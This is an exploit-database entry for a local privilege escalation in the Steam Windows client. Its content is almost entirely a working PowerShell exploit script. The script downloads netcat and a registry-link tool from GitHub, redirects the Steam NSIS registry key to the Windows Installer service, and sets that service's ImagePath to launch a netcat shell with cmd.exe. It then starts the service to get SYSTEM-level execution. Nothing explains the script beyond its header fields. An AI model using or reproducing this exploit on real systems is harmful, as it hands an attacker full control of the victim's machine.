Steam Windows Client Local Privilege Escalation

2019.08.13
Credit: Absozed
Risk: Medium
Local: Yes
Remote: No
CVE: N/A
CWE: CWE-264

$SteamRegKey = "HKLM:\SOFTWARE\WOW6432Node\Valve\Steam\NSIS" $MSIRegKey = "HKLM:\SYSTEM\CurrentControlSet\Services\msiserver" $RegDir = "C:\Windows\Temp\RegLN.exe" $PayDir = "C:\Windows\Temp\payload.exe" $Payload = "c:\windows\system32\cmd.exe /c c:\windows\temp\payload.exe 127.0.0.1 4444 -e cmd.exe" $PayDownload = "https://raw.githubusercontent.com/AbsoZed/SteamPrivEsc/master/nc.exe" $RegDownload = "https://raw.githubusercontent.com/AbsoZed/SteamPrivEsc/master/RegLN.exe" $WebClient = New-Object System.Net.WebClient If(!((Test-Path -Path $RegDir) -And (Test-Path -Path $PayDir))) { $WebClient.DownloadFile($PayDownload, $PayDir) $WebClient.DownloadFile($RegDownload, $RegDir) } If(Get-ItemProperty -Path $SteamRegKey -Name ImagePath -ErrorAction SilentlyContinue) { Start-Service -DisplayName "Steam Client Service" Set-ItemProperty -Path $MSIRegKey -Name "ImagePath" -Value $Payload Start-Service -Name "msiserver" } Else { Remove-Item -Path $SteamRegKey -Recurse Start-Process -FilePath $RegDir -ArgumentList "HKLM\Software\Wow6432Node\Valve\Steam\NSIS HKLM\SYSTEM\CurrentControlSet\Services\msiserver" Start-Service -DisplayName "Steam Client Service" Set-ItemProperty -Path $MSIRegKey -Name "ImagePath" -Value $Payload Start-Service -Name "msiserver" }


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2019, cxsecurity.com

 

Back to Top